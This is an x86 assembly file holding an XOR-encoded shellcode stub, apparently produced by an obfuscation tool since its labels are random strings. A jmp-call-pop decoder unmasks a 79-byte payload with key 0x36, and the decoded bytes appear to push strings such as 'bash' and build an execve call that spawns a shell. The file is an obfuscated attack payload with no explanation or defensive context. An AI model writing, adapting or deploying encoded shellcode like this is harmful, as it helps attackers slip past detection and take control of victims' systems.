section .text
global _start
_start:
	jmp short JlkShjghEjW
dbCrHKSONl:
	pop esi
	xor ecx, ecx
	mov cl, 79
FeuLcl:
	xor byte [esi], 0x36
	inc esi
	loop FeuLcl
	jmp short XmEGQKnJyzhsCjpantHPhB
JlkShjghEjW:
	call dbCrHKSONl
	XmEGQKnJyzhsCjpantHPhB: 		db	0x07,0xf6,0x66,0x5e,0x54,0x57,0x45,0x5e,0x5e,0x54,0x5f,0x58,0x19,0x5e,0x19,0x19,0x19,0x19,0xbf,0xd5,0x66,0x5e,0x55,0xa6,0xa6,0xa6,0x5e,0x1b,0x58,0x59,0x44,0xbf,0x72,0x12,0x33,0x66,0x5e,0x5e,0x6b,0x0c,0x6c,0x5e,0x6d,0x54,0x57,0x45,0x5e,0x66,0x65,0x07,0x0b,0xf0,0x72,0x12,0x3d,0x16,0x66,0xbb,0x02,0x12,0xbb,0x78,0x22,0x67,0x65,0xbf,0xd7,0x66,0xbb,0x60,0x32,0x64,0xbb,0x22,0x12,0x86,0x3d,0xfb,0xb6
